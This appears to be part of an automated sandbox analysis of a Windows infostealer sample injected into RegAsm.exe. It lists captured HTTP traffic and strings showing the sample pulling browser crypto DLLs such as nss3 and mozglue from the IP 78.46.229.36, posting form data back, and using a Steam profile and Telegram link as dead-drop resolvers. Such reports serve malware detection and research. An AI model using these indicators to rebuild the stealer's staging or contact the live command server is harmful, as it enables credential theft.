Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Cache-Control: no-cache

Source: unknown

DNS traffic detected: queries for: steamcommunity.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Host: 78.46.229.36Content-Length: 279Connection: Keep-AliveCache-Control: no-cache

Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: file.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.1982390660.0000000019EED000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1977760885.0000000013F4C000.00000004.00000020.00020000.00000000.sdmp, sqlm[1].dll.3.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://78.46.229.36
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/2
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/B
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/D
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/Hos
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/U&
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/d
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/freebl3.dll
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/g
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/mozglue.dll2E
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/msvcp140.dllnE
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/msvcp140.dllxE
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/nes
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/nss3.dll
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/nss3.dllr#4
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/p&
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/ramData
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/softokn3.dll
Source: RegAsm.exe, 00000003.00000002.1976459689.000000000162C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/softokn3.dllBE
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/sqlm.dll
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/vcruntime140.dll
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000016E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36/~&
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36HIJKF
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36IDGIE
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://78.46.229.36JEBKE
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHl
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=kMVE
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=swtsTjCD0CFZ&amp
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Zj8Lt-uyXH8R&
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=KrKRjQbCfNh0&
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=n5zImpoIZ8N
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/g
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199658817715
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715/badges
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715/inventory/
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715c
Source: file.exe, 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715https://t.me/sa9okCristina
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/about/
